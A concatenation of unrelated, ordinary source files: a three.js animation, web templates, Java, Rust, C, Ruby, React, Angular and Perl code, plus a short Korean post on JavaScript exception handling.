window.addEventListener("touchmove", onMouseMove);
var mouseVector = new THREE.Vector3();
function onMouseMove(e) {
var x = 0;
var y = 0;
if(e.type === "touchmove"){
x = e.touches[0].clientX;
y = e.touches[0].clientY;
}
else{
x = e.clientX;
y = e.clientY;
}
mouseVector.set(( x / ww ) * 2 - 1, -( y / wh ) * 2 + 1,0.5);
mouseVector.unproject(camera);
var dir = mouseVector.sub(camera.position).normalize();
var distance = Math.abs(lengthTube + logoDist) - Math.abs(camera.position.z);
mouse = camera.position.clone().add( dir.multiplyScalar( distance ) );
}
/* ==================== */
/* === Wishes Text ==== */
/* ==================== */
var wishes = new THREE.Object3D();
scene.add(wishes);
function addCopy(){
var geometry = new THREE.PlaneGeometry(radius, 0.25*radius);
var material = new THREE.MeshBasicMaterial({
map: new THREE.TextureLoader().load("../img/copy00.png"),
transparent: true
});
var plane = new THREE.Mesh(geometry, material);
plane.position.copy(curve.getPointAt(.2));
plane.position.x += 0.05;
plane.position.y += 0.25;
wishes.add(plane);
var material = new THREE.MeshBasicMaterial({
map: new THREE.TextureLoader().load("../img/copy01.png"),
transparent: true
});
var plane = new THREE.Mesh(geometry, material);
plane.position.copy(curve.getPointAt(.4));
wishes.add(plane);
var material = new THREE.MeshBasicMaterial({
map: new THREE.TextureLoader().load("../img/copy02.png"),
transparent: true
});
var plane = new THREE.Mesh(geometry, material);
plane.position.copy(curve.getPointAt(.6));
wishes.add(plane);
var material = new THREE.MeshBasicMaterial({
map: new THREE.TextureLoader().load("../img/copy03.png"),
transparent: true
});
var plane = new THREE.Mesh(geometry, material);
plane.position.copy(curve.getPointAt(.8));
wishes.add(plane);
}
/* ====================== */
/* === Path creation ==== */
/* ====================== */
var particles = new THREE.Object3D();
var particlesLogo = new THREE.Object3D();
scene.add(particles);
scene.add(particlesLogo);
noise.seed(0.05);
function createTube() {
//Create the 'tube'
var points = [];
for (var i = 0; i < detailTube; i++) {
var x = noise.simplex2(i * 0.01, 0.01) * 50;
// var x = 0;
var y = noise.simplex2(i * 0.01, 0.01) * 50;
var y = 0;
var z = -(i/detailTube) * lengthTube;
points.push(new THREE.Vector3(x, y, z));
}
curve = new THREE.CatmullRomCurve3(points);
//Create the particles
var geom = new THREE.Geometry();
var geomLogo = new THREE.Geometry();
var frames = curve.computeFrenetFrames( detailTube, true );
var endPoint = curve.getPointAt(1);
for (var i = 0; i < detailTube; i++) {
var N = frames.normals[ i ];
var B = frames.binormals[ i ];
for (var j = 0; j < 80; j++) {
var index = (i / detailTube)+(Math.random()-0.5)*0.01;
index = Math.max(0,Math.min(index,1) );
var p = curve.getPointAt(index);
var position = p.clone();
var angleRotate = Math.random()*Math.PI*2;
var sin = Math.sin( angleRotate );
var cos = - Math.cos( angleRotate );
var normal = new THREE.Vector3();
normal.x = ( cos * N.x + sin * B.x );
normal.y = ( cos * N.y + sin * B.y );
normal.z = ( cos * N.z + sin * B.z );
normal.normalize();
position.x = p.x + radius * normal.x;
position.y = p.y + radius * normal.y;
position.z = p.z + radius * normal.z;
position.vx = 0;
position.vy = 0;
position.vz = 0;
position.accX = 0;
position.accY = 0;
position.accZ = 0;
position.speed = Math.random()+0.2;
position.friction = Math.random() * 0.04 + 0.95;
position.frictionZ = Math.random() * 0.04 + 0.90;
if(j<20){
var destDot = logoParticles[Math.floor(logoParticles.length * Math.random())].clone();
destDot.x += endPoint.x;
destDot.y += endPoint.y;
var angle = destDot.angleTo(endPoint);
destDot.applyAxisAngle(destDot.clone().normalize(), angle*10);
position.dest = destDot;
TweenMax.to(position, Math.random()*8+5,{
x : (Math.random()>0.5)?"+":"-"+"="+Math.random()*2,
y : (Math.random()>0.5)?"+":"-"+"="+Math.random()*2,
z : (Math.random()>0.5)?"+":"-"+"="+Math.random()*2,
ease:Power2.easeOut,
delay : -Math.random()*13,
repeat:-1,
yoyo:true
});
geomLogo.vertices.push(position);
}
else{
position.dest = new THREE.Vector3(position.x, position.y, position.z);
geom.vertices.push(position);
}
}
}
var mat = new THREE.PointsMaterial({
color: 0xffffff,
size: 0.01,
sizeAttenuation: true
});
var dots = new THREE.Points(geom, mat);
particles.add(dots);
var mat = new THREE.PointsMaterial({
color: 0xffffff,
size: 0.2,
opacity : 0.5,
transparent:true,
map : new THREE.TextureLoader().load("https://s3-us-west-2.amazonaws.com/s.cdpn.io/127738/dotTexture.png"),
sizeAttenuation: true
});
var dotsLogo = new THREE.Points(geomLogo, mat);
particlesLogo.add(dotsLogo);
}
var showLogo = false;
var logoImage = new Image();
logoImage.crossOrigin = "";
logoImage.onload = getDataLogo;
logoImage.src = "https://s3-us-west-2.amazonaws.com/s.cdpn.io/127738/emakinaLogo.png"
var logoParticles = [];
function getDataLogo() {
var canvas = document.createElement("canvas"),
ctx = canvas.getContext("2d");
canvas.width = 160;
canvas.height = 349;
ctx.drawImage(logoImage, 0, 0, 160, 349);
var data = ctx.getImageData(0, 0, 160, 349).data;
for (var i = 0; i < 160; i+=2) {
for (var j = 0; j < 349; j+=2) {
if (data[((i + j * 160) * 4) + 3] > 150) {
var pixel = new THREE.Vector3(i - 80, -j + 174, 1).multiplyScalar(radius*0.003);
pixel.z = -lengthTube-logoDist;
logoParticles.push(pixel);
}
}
}
createTube();
addCopy();
requestAnimationFrame(render);
introTl.play();
}
var interval = 0.0005;
var progress = {
z: 0
};
function render(a) {
requestAnimationFrame(render);
var tempProgress = progress.z;
var p1 = curve.getPointAt(tempProgress);
var p2 = curve.getPointAt(tempProgress + interval);
camera.position.set(p1.x, p1.y, p1.z);
camera.lookAt(p2);
var par = "";
if (showLogo) {
for (var i = 0; i < particlesLogo.children[0].geometry.vertices.length; i++) {
par = particlesLogo.children[0].geometry.vertices[i];
par.accX = (par.dest.x - par.x) * 0.003 * par.speed;
par.accY = (par.dest.y - par.y) * 0.003 * par.speed;
par.accZ = (par.dest.z - par.z) * 0.005 * par.speed;
par.vx += par.accX;
par.vy += par.accY;
par.vz += par.accZ;
par.vx *= par.friction;
par.vy *= par.friction;
par.vz *= par.frictionZ;
par.x += par.vx;
par.y += par.vy;
par.z += par.vz;
var distance = mouse.distanceTo(par);
if (distance < 0.8) {
par.accX = (par.x - mouse.x) / 70;
par.accY = (par.y - mouse.y) / 70;
par.vx += par.accX;
par.vy += par.accY;
}
}
}
if(!showLogo && tempProgress > 0.85){
showLogo = true;
}
for(var i=0;i<wishes.children;i++){
wishes.children[i].lookAt(camera.position);
}
particlesLogo.children[0].geometry.verticesNeedUpdate = true;
renderer.render(scene, camera);
}
/* INTRO ANIMATION */
var introTl = new TimelineMax({paused:true, delay:0.5});
introTl.to("body", 0.3, {
opacity:1
});
introTl.from(".intro strong", 0.8, {
opacity:0,
y : "-30%",
ease:Power1.easeOut
});
introTl.staggerFrom(".intro p", 0.8, {
opacity:0,
y : "-30%",
ease:Power1.easeOut
},0.4);
introTl.from(".intro .start", 0.8, {
opacity:0,
ease:Power1.easeOut
});
var animTl = new TimelineMax({
paused: true,
repeat: 0
});
// animTl.timeScale(5);
animTl.set(".intro",{
"pointer-events": "none"
});
animTl.staggerTo([".intro strong",".intro .copy", ".intro .start"], 0.3, {
opacity:0,
y : "-50%",
ease:Power1.easeIn
}, 0.1);
animTl.to("canvas", 0.5, {
opacity:1,
ease: Power2.easeIn
}, "-=0.5");
animTl.to(progress, 2, {
z: 0.1,
ease: Power3.easeIn
});
animTl.to(progress, 4, {
z: 0.28,
ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 4, {
z: 0.48,
ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 4, {
z: 0.68,
ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 4, {
z: 0.88,
ease: SlowMo.ease.config(0.2, 0.7, false)
});
animTl.to(progress, 2, {
z: 0.988,
ease: Power3.easeOut
});
animTl.to("canvas", 1, {
opacity:0.5,
ease: Power2.easeIn
});
animTl.set(".outro",{
"pointer-events": "auto"
});
animTl.from(".outro strong", 0.8, {
opacity:0,
y : "-30%",
ease:Power1.easeOut
}, "+=1");
animTl.staggerFrom(".outro .copy p", 0.8, {
opacity:0,
y : "-50%",
ease:Power1.easeOut
}, 0.4);
document.querySelector(".start").addEventListener("click", function(){
if(ww < 900){
toggleFullScreen();
}
for (var i = 0; i < particlesLogo.children[0].geometry.vertices.length; i++) {
par = particlesLogo.children[0].geometry.vertices[i];
TweenMax.killTweensOf(par);
}
animTl.play();
});
function toggleFullScreen() {
if (!document.fullscreenElement && // alternative standard method
!document.mozFullScreenElement && !document.webkitFullscreenElement) { // current working methods
if (document.documentElement.requestFullscreen) {
document.documentElement.requestFullscreen();
} else if (document.documentElement.mozRequestFullScreen) {
document.documentElement.mozRequestFullScreen();
} else if (document.documentElement.webkitRequestFullscreen) {
document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
}
} else {
if (document.cancelFullScreen) {
document.cancelFullScreen();
} else if (document.mozCancelFullScreen) {
document.mozCancelFullScreen();
} else if (document.webkitCancelFullScreen) {
document.webkitCancelFullScreen();
}
}
}
|
'''
Parse command line arguments
'''
import argparse
def parse_args_common():
'''Parse common command line arguments'''
parser = argparse.ArgumentParser(description='common args.')
parser.add_argument('--dbenv', type=str, required=True,
help='Name of the database backend; '
'options: google_firestore, python_json')
args = parser.parse_args()
return args.dbenv
def parse_args_main_postgresql():
'''Parse command line arguments for postgresql main'''
parser = argparse.ArgumentParser(description='common args')
parser.add_argument('--dbenv', type=str, default="postgres_json",
help='Name of the database backend; '
'options: google_firestore, python_json, postgres_json')
parser.add_argument('--environment', type=str, default="prod",
help='Name of the environment; '
'options: prod, test')
parser.add_argument('--ignore_errors', type=bool, default=True,
help='Ignore possible non-fatal errors')
args = parser.parse_args()
return args.dbenv, args.environment, args.ignore_errors
|
<!-- banner -->
<div id="myCarousel" class="carousel slide" data-ride="carousel">
<!-- Indicators -->
<ol class="carousel-indicators">
<li data-target="#myCarousel" data-slide-to="0" class="active"></li>
<li data-target="#myCarousel" data-slide-to="1" class=""></li>
<li data-target="#myCarousel" data-slide-to="2" class=""></li>
<li data-target="#myCarousel" data-slide-to="3" class=""></li>
<li data-target="#myCarousel" data-slide-to="4" class=""></li>
</ol>
<div class="carousel-inner" role="listbox">
<div class="item active">
<div class="container">
<div class="carousel-caption">
<h3>The Biggest <span>Sale</span></h3>
<p>Special for today</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item2">
<div class="container">
<div class="carousel-caption">
<h3>Summer <span>Collection</span></h3>
<p>New Arrivals On Sale</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item3">
<div class="container">
<div class="carousel-caption">
<h3>The Biggest <span>Sale</span></h3>
<p>Special for today</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item4">
<div class="container">
<div class="carousel-caption">
<h3>Summer <span>Collection</span></h3>
<p>New Arrivals On Sale</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
<div class="item item5">
<div class="container">
<div class="carousel-caption">
<h3>The Biggest <span>Sale</span></h3>
<p>Special for today</p>
<a class="hvr-outline-out button2" href="mens.html">Shop Now </a>
</div>
</div>
</div>
</div>
<a class="left carousel-control" href="#myCarousel" role="button" data-slide="prev">
<span class="glyphicon glyphicon-chevron-left" aria-hidden="true"></span>
<span class="sr-only">Previous</span>
</a>
<a class="right carousel-control" href="#myCarousel" role="button" data-slide="next">
<span class="glyphicon glyphicon-chevron-right" aria-hidden="true"></span>
<span class="sr-only">Next</span>
</a>
<!-- The Modal -->
</div>
<!-- //banner -->
<div class="banner_bottom_agile_info">
<div class="container">
<div class="banner_bottom_agile_info_inner_w3ls">
<div class="col-md-6 wthree_banner_bottom_grid_three_left1 grid">
<figure class="effect-roxy">
<img src="{{ asset('public/images//bottom1.jpg') }}" alt=" " class="img-responsive" />
<figcaption>
<h3><span>F</span>all Ahead</h3>
<p>New Arrivals</p>
</figcaption>
</figure>
</div>
<div class="col-md-6 wthree_banner_bottom_grid_three_left1 grid">
<figure class="effect-roxy">
<img src="{{ asset('public/images//bottom2.jpg') }}" alt=" " class="img-responsive" />
<figcaption>
<h3><span>F</span>all Ahead</h3>
<p>New Arrivals</p>
</figcaption>
</figure>
</div>
<div class="clearfix"></div>
</div>
</div>
</div>
<!-- schedule-bottom -->
<div class="schedule-bottom">
<div class="col-md-6 agileinfo_schedule_bottom_left">
<img src="{{ asset('public/images//mid.jpg') }}" alt=" " class="img-responsive" />
</div>
<div class="col-md-6 agileits_schedule_bottom_right">
<div class="w3ls_schedule_bottom_right_grid">
<h3>Save up to <span>50%</span> in this week</h3>
<p>Suspendisse varius turpis efficitur erat laoreet dapibus.
Mauris sollicitudin scelerisque commodo.Nunc dapibus mauris sed metus finibus posuere.</p>
<div class="col-md-4 w3l_schedule_bottom_right_grid1">
<i class="fa fa-user-o" aria-hidden="true"></i>
<h4>Customers</h4>
<h5 class="counter">653</h5>
</div>
<div class="col-md-4 w3l_schedule_bottom_right_grid1">
<i class="fa fa-calendar-o" aria-hidden="true"></i>
<h4>Events</h4>
<h5 class="counter">823</h5>
</div>
<div class="col-md-4 w3l_schedule_bottom_right_grid1">
<i class="fa fa-shield" aria-hidden="true"></i>
<h4>Awards</h4>
<h5 class="counter">45</h5>
</div>
<div class="clearfix"> </div>
</div>
</div>
<div class="clearfix"> </div>
</div>
|
package com.revolsys.geometry.index.kdtree;
import java.util.ArrayList;
import java.util.List;
import java.util.function.Consumer;
import java.util.function.Predicate;
import org.jeometry.common.function.BiFunctionDouble;
import com.revolsys.geometry.model.BoundingBox;
import com.revolsys.geometry.model.GeometryFactory;
import com.revolsys.geometry.model.Point;
import com.revolsys.util.Emptyable;
public class KdTree implements Emptyable {
private long size;
private KdNode root = null;
private final GeometryFactory geometryFactory;
private final BiFunctionDouble<KdNode> nodeFactory;
private final double scaleXY;
public KdTree() {
this(GeometryFactory.DEFAULT_2D);
}
public KdTree(final BiFunctionDouble<KdNode> nodeFactory) {
this(nodeFactory, GeometryFactory.DEFAULT_2D);
}
public KdTree(final BiFunctionDouble<KdNode> nodeFactory, final GeometryFactory geometryFactory) {
this.nodeFactory = nodeFactory;
this.geometryFactory = geometryFactory;
this.scaleXY = geometryFactory.getScaleXY();
}
public KdTree(final GeometryFactory geometryFactory) {
this(KdNode::new, geometryFactory);
}
public <N extends KdNode> void forEachNode(final BoundingBox boundingBox,
final Consumer<N> result) {
final double minX = boundingBox.getMinX();
final double minY = boundingBox.getMinY();
final double maxX = boundingBox.getMaxX();
final double maxY = boundingBox.getMaxY();
forEachNode(minX, minY, maxX, maxY, result);
}
public <N extends KdNode> void forEachNode(final BoundingBox boundingBox,
final Predicate<? super N> filter, final Consumer<N> result) {
final double minX = boundingBox.getMinX();
final double minY = boundingBox.getMinY();
final double maxX = boundingBox.getMaxX();
final double maxY = boundingBox.getMaxY();
forEachNode(minX, minY, maxX, maxY, filter, result);
}
public <N extends KdNode> void forEachNode(final double minX, final double minY,
final double maxX, final double maxY, final Consumer<N> result) {
if (this.root != null) {
this.root.forEachNode(true, minX, minY, maxX, maxY, result);
}
}
public <N extends KdNode> void forEachNode(final double minX, final double minY,
final double maxX, final double maxY, final Predicate<? super N> filter,
final Consumer<N> result) {
if (this.root != null) {
this.root.forEachNode(true, minX, minY, maxX, maxY, filter, result);
}
}
public GeometryFactory getGeometryFactory() {
return this.geometryFactory;
}
public <N extends KdNode> List<N> getItems(final BoundingBox boundingBox) {
final List<N> result = new ArrayList<>();
final Consumer<N> action = result::add;
forEachNode(boundingBox, action);
return result;
}
public long getSize() {
return this.size;
}
@SuppressWarnings("unchecked")
public <N extends KdNode> N insertPoint(double x, double y) {
if (this.scaleXY > 0) {
x = Math.round(x * this.scaleXY) / this.scaleXY;
y = Math.round(y * this.scaleXY) / this.scaleXY;
}
if (this.root == null) {
this.root = this.nodeFactory.accept(x, y);
return (N)this.root;
} else {
KdNode currentNode = this.root;
KdNode leafNode = this.root;
boolean isAxisX = true;
boolean isLessThan = true;
while (currentNode != null) {
final double x2 = currentNode.getX();
final double y2 = currentNode.getY();
if (x2 == x && y2 == y) {
currentNode.increment();
return (N)currentNode;
} else {
if (isAxisX) {
isLessThan = x < x2;
} else {
isLessThan = y < y2;
}
leafNode = currentNode;
if (isLessThan) {
currentNode = currentNode.getLeft();
} else {
currentNode = currentNode.getRight();
}
isAxisX = !isAxisX;
}
}
this.size = this.size + 1;
final KdNode node = this.nodeFactory.accept(x, y);
if (isLessThan) {
leafNode.setLeft(node);
} else {
leafNode.setRight(node);
}
return (N)node;
}
}
public <N extends KdNode> N insertPoint(final Point point) {
final Point convertedPoint = point.convertPoint2d(this.geometryFactory);
final double x = convertedPoint.getX();
final double y = convertedPoint.getY();
return insertPoint(x, y);
}
@Override
public boolean isEmpty() {
return this.size == 0;
}
}
|
---
layout: post
title: "[JS] Javascript 예외처리: try, catch, finally"
date: 2019-03-26
categories: Javascript
---
Javascript의 예외처리 방법에 대해 정리한 글입니다.
## 예외처리의 필요성
예상치 못하게 발생한 에러를 잘 처리해야 프로그램 전체가 멈추지 않고 동작할 수 있음
## Try, Catch, Finally
```javascript
try {
// 실행하고 싶은 코드
// 여기서 실행하다가 에러가 발생하면 catch 블록으로 이동
throw {전달할 e 값}; // catch 블록으로 이동
}
catch (e) {
// 에러가 발생했을 때,
// 에러를 파라미터로 받아서 처리함
}
finally {
// 가장 마지막에 항상 실행되어야 할 코드
}
```
* try는 반드시 있어야 함
* catch나 finally는 둘 중 하나만 있어도 실행 가능
* `throw` : 에러를 발생시키는 명령어
### 에러 처리 과정
throw가 발생하면 catch 구문을 찾아서 이동
* 현재 블록에 catch나 finally가 없는 경우 상위 블록이나 호출한 함수로 이동
* catch가 존재하지 않는 경우, finally를 실행하고, catch 될 수 있는 구문을 찾아서 이동
* catch 구문에서 에러가 처리되고, 이후 코드를 실행
|
use bbggez::{
color::random_dark_color,
ggez::{
graphics::{Color, Mesh},
nalgebra::{Point2, Vector2},
Context, GameResult,
},
mesh::create_circle,
};
pub struct CannonBall {
location: Vector2<f32>,
color: Color,
size: f32,
velocity: Vector2<f32>,
}
impl CannonBall {
pub fn new(location: Vector2<f32>, size: f32) -> CannonBall {
let color = random_dark_color();
let velocity = Vector2::new(0.0, 0.0);
CannonBall {
location,
color,
size,
velocity,
}
}
pub fn draw(&self, context: &mut Context) -> GameResult<Mesh> {
Ok(create_circle(0.0, 0.0, self.size, self.color, context))
}
pub fn location(&self) -> Point2<f32> {
Point2::new(self.location.x, self.location.y)
}
pub fn update(&mut self) {
self.location += self.velocity;
}
pub fn set_velocity(&mut self, new_velocity: Vector2<f32>) {
self.velocity = new_velocity;
}
pub fn apply_force(&mut self, force: Vector2<f32>) {
self.velocity += force;
}
pub fn reset_location(&mut self, new_location: Vector2<f32>) -> GameResult<()> {
self.location = new_location;
Ok(())
}
pub fn get_size(&self) -> GameResult<f32> {
Ok(self.size)
}
}
|
#include "melon/modules/function/function_module.h"
#include "melon/modules/modules.h"
#include "melon/core/closure.h"
#include "melon/core/array.h"
#include "melon/core/tstring.h"
/***
* @module
*
* This module can be used to programmatically interact with [`Function`](function.md)
* values. Most of the functions in this module can be built upon to enable
* basic functional programming patterns.
*/
#include <stdlib.h>
#include <assert.h>
/***
* Calls a function value programmatically
*
* @arg func The function to be invoked
* @arg args An array of arguments with which the function will be invoked
*
* @returns Whatever the original function returned
*/
static TByte callFunc(VM* vm)
{
melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
melM_arg(vm, args, MELON_TYPE_ARRAY, 1);
melM_stackPush(&vm->stack, func);
Array* arrObj = melM_arrayFromObj(args->pack.obj);
for (TSize i = 0; i < arrObj->count; i++)
{
Value* val = melGetIndexArray(vm, args->pack.obj, i);
melM_stackPush(&vm->stack, val);
}
melCallClosureSyncVM(vm, arrObj->count, 0, 1);
// @TODO: Multiple returns not supported
return 1;
}
/***
* Gets the name of a function value
*
* @arg func The function to extract the name from
*
* @returns The function's name if any, `null` otherwise
*/
static TByte getNameFunc(VM* vm)
{
melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
Closure* cl = melM_closureFromObj(func->pack.obj);
Function* fn = melM_functionFromObj(cl->fn);
Value res;
res.type = MELON_TYPE_STRING;
if (fn->name != NULL)
{
res.pack.obj = fn->name;
}
else
{
res.pack.obj = melNewString(vm, "@anonymous@", strlen("@anonymous@"));
}
melM_stackPush(&vm->stack, &res);
return 1;
}
/***
* Gets the number of arguments a given function expects
*
* @arg func The function to inspect
*
* @returns An integer representing the number of expected arguments
*/
static TByte getArgsCountFunc(VM* vm)
{
melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
Closure* cl = melM_closureFromObj(func->pack.obj);
Function* fn = melM_functionFromObj(cl->fn);
Value res;
res.type = MELON_TYPE_INTEGER;
res.pack.value.integer = fn->args;
melM_stackPush(&vm->stack, &res);
return 1;
}
/***
* Returns the path to the file in which a given function value was defined.
* If the string is built-in or was defined in some non-standard way `null`
* will be returned.
*
* @arg func The function to inspect
*
* @returns A string containing the path to the file or `null`
*/
static TByte getFileFunc(VM* vm)
{
melM_arg(vm, func, MELON_TYPE_CLOSURE, 0);
Closure* cl = melM_closureFromObj(func->pack.obj);
Function* fn = melM_functionFromObj(cl->fn);
Value res;
res.type = MELON_TYPE_NULL;
if (fn->debug.file != NULL)
{
res.type = MELON_TYPE_STRING;
res.pack.obj = melNewString(vm, fn->debug.file, strlen(fn->debug.file));
}
melM_stackPush(&vm->stack, &res);
return 1;
}
static const ModuleFunction funcs[] = {
// name, args, locals, func
{ "call", 2, 0, &callFunc },
{ "getName", 1, 0, &getNameFunc },
{ "getArgsCount", 1, 0, &getArgsCountFunc },
{ "getFile", 1, 0, &getFileFunc },
{ NULL, 0, 0, NULL }
};
TRet melFunctionModuleInit(VM* vm)
{
return melNewModule(vm, funcs);
}
|
FactoryBot.define do
factory :deposit do
description { "Deposit" }
end
end
|
use crossterm::event::KeyModifiers;
pub const NONE_MODIFIER: KeyModifiers = KeyModifiers::empty();
#[macro_use]
macro_rules! key {
// Control + Key
(^$key:literal) => {
crossterm::event::KeyEvent {
code: crossterm::event::KeyCode::Char($key),
modifiers: crossterm::event::KeyModifiers::CONTROL,
}
};
// Key
($key:literal) => {
crossterm::event::KeyEvent {
code: crossterm::event::KeyCode::Char($key),
modifiers: crate::macros::NONE_MODIFIER,
}
};
($($key:tt)+) => {
crossterm::event::KeyEvent {
code: crossterm::event::KeyCode::$($key)+,
modifiers: crate::macros::NONE_MODIFIER,
}
};
}
|
module DataScience
class Importer
def self.load(input_file)
read(input_file)
end
def self.read(input_file)
IO.read(input_file)
end
end
end
|
import { connect } from 'react-redux'
import PermissionPageContainer from './permission-page-container.component'
import {
getSelectedIdentity,
getPermissionsDescriptions,
getPermissionsRequests,
getDomainMetadata,
} from '../../../selectors/selectors'
import { hideLoadingIndication, showLoadingIndication } from '../../../store/actions'
const mapDispatchToProps = dispatch => {
return {
hideLoadingIndication: () => dispatch(hideLoadingIndication),
showLoadingIndication: () => dispatch(showLoadingIndication),
}
}
const mapStateToProps = (state) => {
const requests = getPermissionsRequests(state) || []
const requestedPermissions = requests[0].permissions || {}
const requestedPermissionsKeys = Object.keys(requestedPermissions)
const permissionsDescriptions = getPermissionsDescriptions(state)
const requestedPermissionsDescriptions = requestedPermissionsKeys.reduce((acc, requestedPermissionKey) => {
const requestedPermissionKeyParts = requestedPermissionKey.split('_')
// TODO we should check if this matches a wildcare permission in a better way
const isWildCardPermission = requestedPermissionKeyParts.length === 3
let permissionDescription
if (permissionsDescriptions[requestedPermissionKey]) {
permissionDescription = permissionsDescriptions[requestedPermissionKey]
} else if (isWildCardPermission) {
const wildCardPermissionParameter = requestedPermissionKeyParts[2]
const wildCardPermissionFixedSegement = requestedPermissionKeyParts.slice(0, 2).join('_')
const wildCardPermissionDescription = permissionsDescriptions[`${wildCardPermissionFixedSegement}_*`]
permissionDescription = wildCardPermissionDescription
.replace('$1', wildCardPermissionParameter)
}
return {
...acc,
[requestedPermissionKey]: permissionDescription,
}
}, {})
return {
requests,
selectedIdentity: getSelectedIdentity(state),
permissionsDescriptions: requestedPermissionsDescriptions,
domainMetadata: getDomainMetadata(state),
}
}
export default connect(mapStateToProps, mapDispatchToProps)(PermissionPageContainer)
|
import { Injectable } from '@angular/core';
import { InMemoryDbService } from 'angular-in-memory-web-api';
@Injectable()
export class InMemoryDataService implements InMemoryDbService {
createDb() {
let credentials = [
{
name: 'admin',
password: 'admin'
},
{
name: 'user',
password: 'user'
}
];
let users = [
{
id: 11,
name: 'Mohan Ram',
contact: '9456232123',
address: 'Theni'
},
{
id: 12,
name: 'Satish',
contact: '8834187432',
address: 'Chennai'
}
];
return {
users,
credentials
};
}
}
|
#!/usr/bin/perl
# documentation at end of file
use strict;
use Getopt::Long;
use Pod::Usage;
use File::Spec;
use FindBin qw($Bin);
use Bio::ToolBox::db_helper::config qw(add_database);
use Bio::ToolBox::db_helper qw(open_db_connection);
use Bio::DB::SeqFeature::Store;
use Bio::DB::SeqFeature::Store::GFF3Loader;
# check for additional requirements
my $sql;
eval {
require DBD::SQLite;
$sql = 1;
};
my $VERSION = '1.19';
print "\n This program will set up an annotation database\n\n";
### Quick help
unless (@ARGV) {
# when no command line options are present
# print SYNOPSIS
pod2usage( {
'-verbose' => 0,
'-exitval' => 1,
} );
}
### Get command line options and initialize values
my (
$ucscdb,
$path,
$keep,
$verbose,
$help,
$print_version,
);
my @tables;
# Command line options
GetOptions(
'db=s' => \$ucscdb, # the UCSC database shortname
'path=s' => \$path, # the optional path for the database
'table=s' => \@tables, # which tables to collect
'keep!' => \$keep, # keep the annotation files
'verbose!' => \$verbose, # show db loading
'help' => \$help, # request help
'version' => \$print_version, # print the version
) or die " unrecognized option(s)!! please refer to the help documentation\n\n";
# Print help
if ($help) {
# print entire POD
pod2usage( {
'-verbose' => 2,
'-exitval' => 1,
} );
}
# Print version
if ($print_version) {
print " BioToolBox script db_setup.pl, version $VERSION\n";
eval {
require Bio::ToolBox;
my $v = Bio::ToolBox->VERSION;
print " Biotoolbox package version $v\n";
};
exit;
}
### Check for requirements
unless ($sql) {
die " Please install Perl module DBD::SQLite to set up a database\n";
}
unless ($ucscdb) {
$ucscdb = shift @ARGV or
die " no database name provided! use --help for more information\n";
}
if ($path) {
$path = File::Spec->rel2abs($path);
unless (-e $path) {
mkdir $path or die "unable to make database path $path\n$!\n";
}
unless (-w _) {
die " $path is not writable!\n";
}
}
else {
# determine a path
if (-e File::Spec->catdir($ENV{HOME}, 'Library')) {
$path = File::Spec->catdir($ENV{HOME}, 'Library');
}
elsif (-e File::Spec->catdir($ENV{HOME}, 'lib')) {
$path = File::Spec->catdir($ENV{HOME}, 'lib');
}
else {
# make one for us
$path = File::Spec->catdir($ENV{HOME}, 'lib');
mkdir $path or die "unable to make database path $path\n$!\n";
}
}
if (@tables) {
if ($tables[0] =~ /,/) {
my $t = shift @tables;
@tables = split /,/, $t;
}
}
else {
@tables = qw(refgene ensgene knowngene);
}
my $start_time = time;
### Get UCSC annotation
print "##### Fetching annotation from UCSC. This may take a while ######\n";
system(File::Spec->catdir($Bin, 'ucsc_table2gff3.pl'), '--db', $ucscdb, '--ftp',
join(',', @tables), '--gz') == 0 or
die "unable to execute ucsc_table2gff3 script!\n";
my @gff = glob("$ucscdb*.gff3.gz");
my @source = glob("$ucscdb*.txt.gz");
unless (@gff) {
die "unable to find new GFF3 files!\n";
}
### Build database
print "##### Building database. This may take a while ######\n";
my $database = File::Spec->catdir($path, "$ucscdb.sqlite");
my $temp = File::Spec->tmpdir();
# create a database
my $store = Bio::DB::SeqFeature::Store->new(
-dsn => $database,
-adaptor => 'DBI::SQLite',
-tmpdir => $temp,
-write => 1,
-create => 1,
-compress => 0, # compression seems to be broken, cannot read db
) or die " Cannot create a SeqFeature database connection!\n";
# load the database
my $loader = Bio::DB::SeqFeature::Store::GFF3Loader->new(
-store => $store,
-sf_class => 'Bio::DB::SeqFeature',
-verbose => $verbose,
-tmpdir => $temp,
-fast => 1,
-ignore_seqregion => 0,
-index_subfeatures => 1,
-noalias_target => 0,
-summary_stats => 0,
)or die " Cannot create a GFF3 loader for the database!\n";
# on signals, give objects a chance to call their DESTROY methods
# borrowed from bp_seqfeature_load.pl
$SIG{TERM} = $SIG{INT} = sub { undef $loader; undef $store; die "Aborted..."; };
$loader->load(@gff);
### Check database
my $db;
if (-e $database and -s _) {
$db = open_db_connection($database);
}
if ($db) {
print "\n##### Created database $database ######\n";
printf " Finished in %.1f minutes\n\n", (time - $start_time) / 60;
my $a = add_database(
'name' => $ucscdb,
'dsn' => $database,
'adaptor' => 'DBI::SQLite',
);
if ($a) {
print <<SUCCESS;
The database configuration was added to the BioToolBox configuration
file. You may use the database in any BioToolBox script with the
option --db $ucscdb.
You can check the database now by running
db_types.pl $ucscdb
SUCCESS
}
}
else {
print "##### Something went wrong! Database could not be opened #####\n";
unlink $database if -e $database;
}
### Clean up
if ($db and not $keep) {
unlink @gff;
unlink @source;
}
__END__
=head1 NAME
db_setup.pl
=head1 SYNOPSIS
db_setup.pl [--options...] <UCSC database>
Options:
--db <UCSC database>
--path </path/to/store/database>
--table [refGene|ensGene|knownGene|xenoRefGene|all]
--keep
--verbose
--version
--help
=head1 OPTIONS
The command line flags and descriptions:
=over 4
=item --db <UCSC database>
Provide the short UCSC database name for the species and version you want
to use. See L<http://genome.ucsc.edu/FAQ/FAQreleases.html> for a current
list of available UCSC genomes. Examples include hg19, mm10, danRer7,
sacCer3, etc.
=item --path </path/to/store/database>
